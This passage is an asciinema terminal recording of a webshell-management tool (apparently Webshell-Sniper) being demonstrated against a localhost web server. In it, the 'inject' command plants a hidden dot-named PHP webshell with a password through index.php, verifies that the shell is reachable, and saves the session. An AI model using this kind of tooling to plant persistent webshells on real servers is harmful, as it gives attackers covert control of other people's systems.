[48.274, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.3371, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.4001, "o", "\u001b[?25l\u001b[?7l\u001b[53D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32minject\u001b[0m \u001b[0;33mweb\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33ms3cr3t\u001b[53D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[48.4022, "o", "\u001b[95m[+] [inject] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[48.408, "o", "\u001b[1;32m[+] Injected: http://127.0.0.1:8080/.KRwYZGXiAZJtXmdz.php (password=s3cr3t)\u001b[0m\r\n"]
[48.4103, "o", "\u001b[1;32m[+] Verified reachable: http://127.0.0.1:8080/.KRwYZGXiAZJtXmdz.php\u001b[0m\r\n"]
[48.4112, "o", "\u001b[6n"]
[48.4125, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.4139, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0052, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0669, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1286, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1903, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.252, "o", "\u001b[?25l\u001b[?7l\u001b[29D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mquit\u001b[29D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[51.2528, "o", "\u001b[95m[+] Saved session (1 shell(s)) to \u001b[0m\r\n\u001b[95m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/session_1782486832.json\u001b[0m\r\n"]
